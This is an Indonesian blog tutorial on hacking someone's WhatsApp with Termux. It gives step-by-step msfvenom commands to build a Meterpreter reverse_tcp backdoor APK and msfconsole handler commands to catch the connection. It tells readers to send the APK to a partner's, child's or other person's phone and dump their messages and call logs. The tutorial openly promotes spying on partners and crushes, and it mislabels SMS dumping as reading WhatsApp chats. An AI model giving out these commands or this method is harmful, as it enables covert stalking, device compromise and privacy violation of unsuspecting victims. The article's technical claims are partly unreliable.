Cara Hack WA Via Termux 2024

Cara Hack WA Via Termux
Cara Hack WA Via Termux - Cara menyadap atau menghack WhatsApp adalah sebuah langkah-langkah mematai-matai aktivitas apa saja yang dilakukan oleh pengguna akun WhatsApp yang menjadi korban.

Dimana menyadap akun WhatsApp ini bisa dilakukan oleh orang tua guna mengawasi anak-anak mereka dan tujuan positif lainnya agar terhindar dari hal yang tidak baik saat ini.

Nah pada kali ini, kami akan membagikan tips atau cara untuk anda semua tentang bagaimana cara menghack WhatsApp dengan menggunakan aplikasi Termux yang mudah dan juga cepat.

Perlu anda ketahui, bahwa terdapat beberapa cara untuk menghack WhatsApp orang lain atau anak bahkan juga pasangan anda ya guys, salah satunya adalah dengan menggunakan aplikasi Termux di HP Android yang anda gunakan.

Apabila anda penasaran dengan caranya, maka dengan begitu anda bisa menyimak artikel ini sampai selesai agar anda tahu caranya.

Untuk lebih jelasnya, silahkan anda simak langsung ulasan dibawah ini mengenai cara hack WA via Termux ya guys.

Sekilas Tentang Aplikasi Termux

Cara Hack WA Via Termux
Sekilas Tentang Aplikasi Termux
Nah sebelum ke langkah-langkah cara hack WA via Termux, alangkah baiknya terlebih dahulu anda perlu mengetahui ulasan tentang Termux.

Termux sendiri merupakan sebuah linux evirontment atau emulator terminal Android yang mempunyai sebuah situs resmi Termux.com ini ya guys.

Yang mana aplikasi ini kompitible atau mendukung perangkat yang berbasis OS Androis Lollipop (5.0) keatas dan juga 32-64 bit.

Menariknya lagi, aplikasi ini meskipun tidak hanya bisa digunakan untuk aktivitas hacking. Tetapi para pengguna banyak menggunakan aplikasi Termux ini untuk aktivitas hacking yakni seperti meretas website, akun Facebook dan masih banyak lagi lainnya.

Mungkin bagi anda yang bertanya, lantas bagaimana cara menggunakannya? Sebenarnya untuk cara penggunaan aplikasi ini anda tidak perlu pusing-pusing, karena aplikasi ini menjadi salah satu aplikasi yang mempunyai banyak tutorial di YouTube, Google Serach dan platform lainnya.

Selain itu, anda juga bisa mengunjungi website resminya yakni Termux.com, lalu pilihlah menu Google Play untuk masuk mengunduh aplikasinya.

Dan setelah itu anda tidak perlu settingan tambahan cukup update dan upgrade karena pihak Termux sudah menyediakan Package yang bisa anda gunakan sesuai dengan kebutuhan anda untuk apa aplikasi tersebut.

Cara Hack WA Via Termux

Cara Hack WA Via Termux
Cara Hack WA Via Termux
Adapun kali ini adalah langkah-langkah cara hack WA via Termux yang bisa anda simak ulasannya sebagai berikut:
  • Langkah pertama yang harus anda lakukan adalah mendownload aplikasi Termux di Google Play Store atau juga bisa melalui link berikut ini (Download Aplikasi Termux Play Store).
  • Nah jika proses downloadnya sudah selesai, maka anda tinggal install aplikasinya di HP Android anda dan setelah itu silahkan anda bukan Termux serta ketikan perintah ifconfig agar anda bisa mengetahui alamat IP anda.
  • Kemudian anda bisa ketik huruf msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk – LHOST dan lhost di ganti dengan IP anda yang tadi ya guys.
  • Maka dengan begitu, File Backdoor sudah anda buat dan setelah itu silahkan anda cek filenya di folder FILE > HOME maka di folder ini anda akan menemukan file hack.apk.
  • Setelah itu silahkan anda bisa buka aplikasi Termux lagi, lalu anda ketikan perintah seperti contoh dibawah ini dan pastikan datanya sama dengan file yang tadi anda buat. Berikut adalah contoh perintahnya:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.166
set lport 4444
exploit
  • Apabila sudah dipastikan data filenya sesuai, maka saat ini tugas anda ialah mengirimkan file hack.apk tadi ke HP pasangan anda atau orang lain yang ingin anda sadap WhatsAppnya.
  • Jika anda sudah berhasil menginstall aplikasinya, maka dengan begitu silahkan ketikan perintah di Termux anda seperti berikut ini:
Ketiklah dump_sms untuk mengetahui isi chat atau pesan di WA pasangan anda
ketiklah dump_calllog agar anda bisa langsung melihat riwayat panggilan di WA pasangan anda
  • Selesai.

Yang mana dengan begitu, anda bisa melakukan hack WhatsApp pasangan atau anak dengan Termux dan kini anda bisa melihat semua pesan serta riwayat panggilan setiap saat.

Dan perlu anda ketahui, bahwa aplikasi Termux ini tidak hanya bisa menghack WhatsApp saja karena aplikasi lain seperti Facebook, LINE, Instagram juga bisa dihack menggunakan aplikasi Termux ini.

Fungsi Aplikasi Termux

Cara Hack WA Via Termux
Fungsi Aplikasi Termux
Nah selain digunakan untuk aktivitas hacking, aplikasi Termux sendiri mempunyai fungsi lain yaitu sebagai berikut:
  • Bisa menjadi aplikasi editor terminal, jadi bukan untuk edit foto ataupun video saja ya guys.
  • Bisa digunakan sebagai SSH Client juga.
  • Selain itu juga bisa digunakan untuk mencari file yang tersembunyi didalam penyimpanan Smartphone dengan cepat meskipun terdapat banyak sub folder.
  • Yang mana bisa juga digunakan sebagai alat tes seberapa kuat keamanan akun.

Dari beberapa fungsi aplikasi Termux yang sudah kami sebutkan sebelumnya, dimana masih banyak fungsi Termux lainnya yang bisa anda dapatkan apalagi aplikasi ini mempunyai pembaruan yang rutin dengan jangka waktu tertentu.

Akhir Kata

Nah demikianlah itu dia langkah-langkah cara hack WA via Termux beserta fungsinya yang sudah kami bagikan diatas untuk anda, maka dengan begitu anda tidak akan kebingungan lagi.

Banyak pengguna Termux yang belajar untuk meretas suatu sistem, ibaratnya Termux ini bisa dijadikan alat latihan ya guys. Aplikasi Termux ini juga bisa digunakan untuk meretas website.

Akan tetapi, jika anda ingin menggunakan Termux untuk tujuan hacking. Biasanya dibutuhkan aplikasi atau tools pendukung lainnya yakni seperti Hydra, Nmap dan lainnya.

Bagaimana, sangat mudah sekali bukan? Sekarang anda bisa melakukan penyadapan terhadap akun WhatsApp atau WA yang di inginkan. Misalnya seperti pacar, gebetan, anak dan masih banyak lagi lainnya.

Mungkin jika menurut anda ulasan ini cukup penting, silahkan bagikan saja langsung kepada teman-teman anda yang belum mengetahuinya. Sekian dan semoga bermanfaat.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel